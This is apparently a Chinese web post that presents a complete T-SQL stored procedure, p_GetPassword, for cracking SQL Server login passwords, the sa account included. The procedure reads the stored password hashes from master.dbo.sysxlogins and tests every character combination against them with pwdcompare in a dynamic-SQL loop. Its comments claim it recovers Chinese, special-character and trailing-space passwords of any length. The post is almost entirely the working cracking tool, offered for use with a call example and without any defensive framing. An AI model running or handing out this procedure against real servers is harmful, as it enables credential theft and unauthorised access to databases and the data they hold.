一个SQL Server Sa密码破解的存储过程

一个SQL Server Sa密码破解的存储过程:

if exists (select * from dbo.sysobjects where id = object_id(N"[dbo].[p_GetPassword]") and OBJECTPROPERTY(id, N"IsProcedure") = 1)

drop procedure [dbo].[p_GetPassword]

GO

/*--穷举法破解 SQL Server 用户密码

可以破解中文,特殊字符,字符+尾随空格的密码

为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII

理论上可以破解任意位数的密码

条件是你的电脑配置足够,时间足够

/*--调用示例

exec p_GetPassword

--*/

create proc p_GetPassword

@username sysname=null, --用户名,如果不指定,则列出所有用户

@pwdlen int=2 --要破解的密码的位数,默认是2位及以下的

as

set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

select top 255 id=identity(int,0,1) into #t from syscolumns

alter table #t add constraint PK_#t primary key(id)

select name,password

,type=case when xstatus&2048=2048 then 1 else 0 end

,jm=case when password is null then 1 else 0 end

,pwdstr=cast("" as sysname)

,pwd=cast("" as varchar(8000))

into #pwd

from master.dbo.sysxlogins a

where srvid is null

and name=isnull(@username,name)

declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)

declare @l int

select @l=0

,@s1="char(aa.id)"

,@s2="cast(aa.id as varchar)"

,@s3=",#t aa"

exec("

update pwd set jm=1,pwdstr="+@s1+"

,pwd="+@s2+"

from #pwd pwd"+@s3+"

where pwd.jm=0

and pwdcompare("+@s1+",pwd.password,pwd.type)=1

")

while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

begin

select @l=@l+1

,@s1=@s1+"+char("+char(@l/26+97)+char(@l%26+97)+".id)"

,@s2=@s2+"+"",""+cast("+char(@l/26+97)+char(@l%26+97)+".id as varchar)"

,@s3=@s3+",#t "+char(@l/26+97)+char(@l%26+97)

exec("

update pwd set jm=1,pwdstr="+@s1+"

,pwd="+@s2+"

from #pwd pwd"+@s3+"

where pwd.jm=0

and pwdcompare("+@s1+",pwd.password,pwd.type)=1

")

end

select 用户名=name,密码=pwdstr,密码ASCII=pwd

from #pwd

go